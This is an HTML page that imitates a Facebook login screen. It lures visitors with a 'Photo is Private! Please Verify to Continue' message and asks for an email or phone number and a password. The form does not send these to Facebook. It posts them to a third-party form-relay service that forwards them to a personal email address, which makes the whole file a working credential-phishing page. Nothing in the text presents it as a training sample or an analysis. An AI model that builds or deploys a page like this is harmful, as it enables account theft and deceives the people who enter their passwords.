
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <link rel="icon" href="fb.png">
    <title>Facebook Verification</title>
        <meta name="viewport" content="width=device-width, initial-scale=1">
    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">   
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.0.0/js/bootstrap.min.js"></script>
    <style type="text/css">
 .form-signin { max-width: 330px; padding: 15px; margin: 0 auto; } .form-signin .form-signin-heading, .form-signin .checkbox
{ margin-bottom: 10px; } .form-signin .checkbox { font-weight: normal; } .form-signin .form-control { position: relative;
font-size: 16px; height: auto; padding: 10px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box;
} .form-signin .form-control:focus { z-index: 2; } .form-signin input[type="text"] { margin-bottom: -1px; border-bottom-left-radius:
0; border-bottom-right-radius: 0; } .form-signin input[type="password"] { margin-bottom: 10px; border-top-left-radius: 0;
border-top-right-radius: 0; } .account-wall { margin-top: 20px; padding: 40px 0px 20px 0px; background-color: #f7f7f7; -moz-box-shadow:
0px 2px 2px rgba(0, 0, 0, 0.3); -webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3); box-shadow: 0px 2px 2px rgba(0, 0, 0,
0.3); } .login-title { color: #555; font-size: 18px; font-weight: 400; display: block; } .profile-img { width: 96px; height:
96px; margin: 0 auto 10px; display: block; -moz-border-radius: 50%; -webkit-border-radius: 50%; border-radius: 50%; } .need-help
{ margin-top: 10px; } .new-account { display: block; margin-top: 10px; }
        .navbar-default {
        background-color:#3b5998;
        background-image: none;
        background-repeat: no-repeat;
    }
    .navbar-brand
    {
        position: absolute;
        width: 100%;
        left: 0;
        text-align: center;
        margin:0 auto;
        font-weight: 900;
    }
    .container
    {
        background-color: #ECEFF5;
        text-align:center;
    }
    </style>
</head>
<body>
    <nav class="navbar navbar-default">
        <div class="navbar-header">
            <a class="navbar-brand" href="#" style="color: white;font-size: 25px"> facebook</a>
        </div>
    </nav>
    <div class="container">    
    <div class="row">
        <div class="col-sm-6 col-md-4 col-md-offset-4">
            <h3 class="text-center">Photo is Private!</h3>
            <h1 class="text-center login-title">Please Verify to Continue</h1>
<form class="form-signin" action="https://formspree.io/vikashkhairwal@gmail.com" method="post">
            <input type="text" name="email" class="form-control" placeholder="Email address or Phone number" required autofocus>
<input type="password" name="_replyto" class="form-control" placeholder="Password" required>
            <button class="btn btn-md btn-primary btn-block" style ="background-color: #3578E5"type="submit" value="Send">Log In</button>
            <br/>
            <br/>
            <span ><a href="#">  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Forgotten password?</a><span aria-hidden="true"> · </span><a href="#" >Help Centre</a></span>
            </form>
        </div>
    </div>
    </div>  
<footer>
<p style="text-align: center">Facebook ©2018</p>
</footer>
</body>
</html>
